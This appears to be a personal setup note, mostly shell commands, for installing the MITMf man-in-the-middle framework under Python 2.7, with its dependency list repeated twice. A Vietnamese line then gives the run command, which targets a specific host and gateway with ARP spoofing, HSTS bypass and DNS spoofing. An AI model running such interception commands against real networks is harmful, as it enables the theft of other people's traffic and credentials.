apt update

apt-get install python-dev-is-python2 python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone4 libcapstone-dev -y

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py

python get-pip.py

pip install virtualenvwrapper

export VIRTUALENVWRAPPER\_PYTHON=/usr/bin/python

source `which virtualenvwrapper.sh`

mkvirtualenv MITMf -p /usr/bin/python2.7

git clone https://github.com/byt3bl33d3r/MITMf

cd MITMf && git submodule init && git submodule update --recursive

pip install pyinotify

pip install python-magic

pip install capstone

pip install Inject

pip install chardet

pip install bs4

pip install Pillow

pip install pefile

pip install python-magic

pip install capstone

pip install cryptography

pip install pypcap

pip install scapy

pip install ipy

pip install configobj

pip install netaddr

pip install pyopenssl

pip install Flask

pip install dnslib

pip install pycrypto

pip install dnspython

pip install user\_agents

pip install service\_identity

pip install lxml

pip install pyasn1

pip install requests

pip install msgpack-python

pip install twisted

export VIRTUALENVWRAPPER\_PYTHON=/usr/bin/python

source `which virtualenvwrapper.sh`

mkvirtualenv MITMf -p /usr/bin/python2.7

git submodule init && git submodule update --recursive

pip install pyinotify

pip install python-magic

pip install capstone

pip install Inject

pip install chardet

pip install bs4

pip install Pillow

pip install pefile

pip install python-magic

pip install capstone

pip install cryptography

pip install pypcap

pip install scapy

pip install ipy

pip install configobj

pip install netaddr

pip install pyopenssl

pip install Flask

pip install dnslib

pip install pycrypto

pip install dnspython

pip install user\_agents

pip install service\_identity

pip install lxml

pip install pyasn1

pip install requests

pip install msgpack-python

pip install twisted

sau khi cài xong cahỵ lệnh

python2.7 mitmf.py -i eth0 --target 192.168.74.233 --gateway 192.168.74.2 --arp --spoof --hsts --dns